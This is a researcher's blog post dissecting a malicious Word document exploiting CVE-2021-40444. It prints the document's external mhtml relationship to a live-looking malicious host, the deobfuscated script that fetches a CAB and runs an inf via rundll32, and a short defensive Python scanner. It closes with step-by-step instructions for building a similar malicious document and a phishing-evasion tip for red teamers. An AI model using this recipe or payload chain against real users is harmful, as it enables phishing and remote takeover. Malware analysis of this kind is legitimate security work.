CVE-2021-40444 Analysis/Exploit


Intro

I’m writing this blog post with no prior technical background on this exploit, so I would like to share my experience with it. I saw a lot of people do a proof of concept, so I decided to do something different: I will get the exploit, then analyze it and go deeper into it. If you notice any mistake in my blog post, DM me on my Twitter account.

I hope I can do something useful, enjoy reading.

Test Environment

Here is my test environment lab listed below:

  1. Windows System
    1. Process Monitor
    2. Microsoft Office
    3. python3
    4. vscode

Process Monitor will help us figure out what happens when we open the affected Word document.

Python3 will help us start a SimpleHTTPServer; feel free to use whatever you want.

After setting up the environment, I will download the exploit sample from https://github.com/rfcxv/CVE-2021-40444-POC

Thanks so much, @rfcxv and @JAMESWT_MHT for uploading the samples.

After downloading the samples, I renamed the file.

image-20210911061213972

Dynamic Analysis

I would like to start with dynamic analysis to figure out what happens behind the scenes. So I will start Process Monitor, then press CTRL+E to stop capturing events and CTRL+X to clear the captured events.

Then I will set up a filter to capture only the Microsoft Word events: press CTRL+L, set WINWORD.exe in the filter, then apply the changes.

image-20210911062805054

Then let’s capture our Word events by pressing CTRL+E again and opening the Word document.

Static Analysis

Word Document

Here I will do some static analysis, starting with the doc file. So let’s unpack the document by changing the file extension to .zip and extracting the file data.

image-20210911072210854

When I went to check the files, I noticed two weird URLs in the relationship file.

image-20210911074246672

Relationship file

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
	<Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" />
	<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" />
	<Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml" />
	<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" />
	<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" />
	<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html" TargetMode="External" />
	<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.wmf" />
	<Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg" />
</Relationships>

A relationship file normally contains references to internal/external resources such as fonts, themes, web settings, etc.

I found two external URLs referring to the hidusi.com domain.

MHTML is a file extension for the Web page archive format saved by Internet Explorer. The archived Web page is an MHTML document. MHTML saves the Web page content and incorporates external resources, such as images, applets, Flash animations and so on, into a single HTML document.

So I decided to add that domain name to my hosts file and start an HTTP server with Python.
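As an added example (not from the original post, nor from the sample’s authors), here is a small Python scanner that unpacks an OOXML package, reads every .rels part and flags external relationships that are oleObject links or use the mhtml:/x-usc: prefixes seen above; this is the kind of check the “Note for Red Teamer” at the end refers to. The package is constructed in memory from the rId6 entry of the relationship file plus a constructed, benign external hyperlink (https://example.invalid/) to show that ordinary external links are not flagged.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
            "relationships/oleObject")

def find_external_ole_rels(docx_bytes):
    """Return (part, Id, Target) for every relationship that leaves the package
    (TargetMode="External") and is an oleObject link or uses mhtml:/x-usc:."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for part in pkg.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(part))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                target = rel.get("Target", "")
                is_external = rel.get("TargetMode", "Internal") == "External"
                low = target.lower()
                if is_external and (rel.get("Type") == OLE_TYPE
                                    or low.startswith("mhtml:")
                                    or "x-usc:" in low):
                    findings.append((part, rel.get("Id"), target))
    return findings

# Constructed sample: only the parts needed to exercise the scanner (a real .docx
# has many more). rId6 is the entry from the post; rId9 is a constructed benign link.
SAMPLE_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="%s">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId6" Type="%s" Target="mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html" TargetMode="External"/>
  <Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.invalid/" TargetMode="External"/>
</Relationships>""" % (RELS_NS, OLE_TYPE)

def build_sample_docx():
    """Build a minimal in-memory OOXML zip carrying the constructed .rels part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("word/document.xml", "<w:document/>")
        pkg.writestr("word/_rels/document.xml.rels", SAMPLE_RELS)
    return buf.getvalue()

if __name__ == "__main__":
    for part, rid, target in find_external_ole_rels(build_sample_docx()):
        print(f"{part}: {rid} -> {target}")
```

To scan a real document, pass the bytes of the .docx file to find_external_ole_rels instead of the constructed package.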

image-20210911075233399

image-20210911075304692

Now let’s see what will happen when I open the document again.

image-20210911075345459

Okay, it goes to fetch the content of side.html, as I found in the relationship file. There is an ID for each relationship, so I can take the ID of that relationship and search for it in document.xml to find more details.

image-20210911095308848

And yeah, I found an OLEObject for that ID, as expected.

A Word OLE (Object Linking and Embedding) object is used to make content created in one program available in a Word document. For example, users can insert an Excel worksheet in a Word document.

Both linked objects and embedded objects can be used between Word and other programs.

CAB file

When I took a look into the cab file through WinRAR, I noticed an inf binary inside it, and it looks like there is an LFI-style path traversal because there is ..\ before the file name. But okay, we’ll go deeper into that later; for now let’s find out what the inf binary does.

I’ll use the file command, but as we know that command is on Linux and I do not have bash or a Linux subsystem on my machine. Thanks so much to @nscaife for this awesome work: https://github.com/nscaife/file-windows/releases

image-20210911114131808

After taking a look at the inf binary from that cab file in IDA, I found the following:

  1. It calls VirtualAlloc and CreateThread to return a reverse shell to the attacker.

image-20210911115854255 createthread

HTML File

So my next step will be analyzing that HTML file.

I found JS in the HTML, but sadly it was obfuscated.

image-20210911075828285

So I will dig more to figure out the goal of that JS. To do that I will need some dynamic debugging, and again I can do this through vscode; I’ll select Edge for debugging because the HTML supports IE11.

JavaScript Dynamic Debugging

When I looked at the first array I noticed something that looks like it tries to send a GET request to fetch the cab file, but let’s go deeper.

image-20210911091543134

I will set a breakpoint at this point

image-20210911101450946

because I noticed it does some push and shift on the first array, so I decided to discover more about it.

So all I’ll do is set a breakpoint at this line, then run my debugger on Edge and keep my eye on the array.

image-20210911101911172

And yeah, as expected, it takes the first value out of the array and pushes it onto the end again. Now, if you noticed, there is an if condition before it modifies the array; I think this condition is just there to stop the push at a specific value, so I’ll move my breakpoint to the break function to check the array after that modification.

image-20210911102741585

Fine, now our new array is

['#version=5,0,0,0', 'ssi', 'iframe', '748708rfmUTk', 'documentElement', 'lFile', 'location', '159708hBVRtu', 'a/Lo', 'Script', 'document', 'call', 'contentWindow', 'emp', 'Document', 'Obj', 'prototype', 'lfi', 'bject', 'send', 'appendChild', 'Low/championship.inf', 'htmlfile', '115924pLbIpw', 'GET', 'p/championship.inf', '1109sMoXXX', './../A', 'htm', 'l/T', 'cal/', '1wzQpCO', 'ect', 'w/championship.inf', '522415dmiRUA', 'http://127.0.0.1/test.cab', '88320wWglcB', 'XMLHttpRequest', 'championship.inf', 'Act', 'D:edbc374c-5730-432a-b5b8-de94f0b57217', 'open', '<bo', 'HTMLElement', '/..', 'veXO', '102FePAWC', '123', '365952KMsRQT', 'tiveX', '/Lo', './../../', 'contentDocument', 'ppD', 'Dat', 'close', 'Acti', 'removeChild', 'mlF', 'write', './A', 'ata/', 'ile', '../', 'body', 'setAttribute']

If you want to count how many times it goes into the else branch, simply make a flag variable with value 0, add 1 each time it enters the else, and log it before the break.

image-20210911103716067

If you did that, you can find the count easily in the console section.

image-20210911103812268

Then I decided to take a fast look at all the variables, so basically I typed var in the search and found 15 variables; minus 1 variable for our flag leaves 14 variables, so it didn’t take much time to notice the following:

  1. There are 3 variables whose value is only one letter (_0x371a71, _0xd7e33d, _0x487bfa).
  2. Some variables are concatenations of array entries and other variables.

So now I decided to create a script that takes the obfuscated file and replaces these variables with their values. Wait, what!!!?

I’m too lazy right now, so I won’t do that now :joy:

All I will do is replace them myself.

Dynamic Analysis again

So now we know that the HTML file will go and download the cab file.

Now I’ll create a folder called e8c76295a5f9acb7 with side.html in it to let the Word document open the HTML and execute the JavaScript. As we know, the JavaScript will do a GET request to e8c76295a5f9acb7/ministry.cab to get the cab file, so let’s also move the cab file into our folder.

image-20210911112042427

image-20210911112054473

Then let’s start our Python HTTP server and see what happens.

image-20210911112243649

At this point, I do not know how this file is used.

So to get the answer, let’s capture the Word events and see what happens in the background.

Here I’ll filter on the inf binary to find where it is used.

image-20210911121638683

And yeah, I found it running through rundll32.exe.

WHAT WAIT A MINUTE !!!!!!!!!!!!


tbh idk why sometimes rundll32.exe cannot find championship.inf, while if you go to the path you will find it :(

As we see, rundll32.exe tries to run the inf file from many paths, in the order given in the JavaScript.

If we take a close look at any of these events, we will find the full command line.

image-20210911122520601

And if we go to C:\Users\PwnLab\AppData\Local\Temp, we will find

image-20210911123151040

Exploit Setup

I lost my energy after all I did, and I want to publish this blog post before going to sleep, so I will list a few steps on how to create your own malicious document.

  1. Download Office.
  2. Create a normal Word document.
  3. Add a Bitmap Image.
  4. Unpack the document.
  5. Modify document.xml.rels to add your external relationship.
  6. Modify document.xml to add an OLEObject with the same relationship ID.
  7. Pack the document again.
  8. Create your own dll.
  9. Convert the dll to cab.
  10. Modify the HTML file to add your cab location and inf file.

Note for Red Teamer

If you are planning to use this CVE in your phishing engagement, take care, because many solutions check the relationship files, and if they find any kind of external relationship they will take that URL and open it to check whether it serves malicious data. So watch out :)

If you have feedback, please go ahead and DM me on Twitter. See you in the next blog post.